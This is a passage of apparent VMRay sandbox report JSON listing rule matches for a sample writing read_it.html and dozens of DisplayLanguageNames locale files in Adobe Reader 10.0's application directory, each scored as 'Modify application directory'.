"rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_EG.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_eg.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9433", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_eg.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_IN.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_in.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9442", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_in.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_IQ.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_iq.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9451", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_iq.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_JO.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_jo.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9460", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_jo.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_KW.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_kw.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9469", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_kw.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_LB.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_lb.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9478", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_lb.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_LY.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_ly.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9487", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_ly.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_MA.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_ma.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9496", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_ma.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_OM.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_om.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9505", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_om.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_QA.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_qa.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9514", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_qa.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_SA.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_sa.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9523", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_sa.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_SD.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_sd.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9532", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_sd.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_SY.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_sy.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9541", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_sy.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_TN.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_tn.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9550", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_tn.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ar_YE.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_ye.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9559", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ar_ye.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.bg.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.bg.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9568", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.bg.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.bg_BG.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.bg_bg.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9577", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.bg_bg.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ca.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ca.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9586", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ca.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ca_ES.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ca_es.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9595", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ca_es.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.ca_ES_PREEURO.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ca_es_preeuro.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9604", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.ca_es_preeuro.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.cs.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.cs.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9613", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.cs.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.cs_CZ.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.cs_cz.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9622", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.cs_cz.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.da.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.da.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9631", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.da.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.da_DK.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.da_dk.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9640", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.da_dk.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.de_CH.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.de_ch.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9649", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.de_ch.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.de_DE.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.de_de.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9658", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.de_de.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.de_DE_PREEURO.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.de_de_preeuro.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9667", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.de_de_preeuro.txt\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.el.txt", "hashes": [], "norm_filename": "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.el.txt", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_9676", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files (x86)\\adobe\\reader 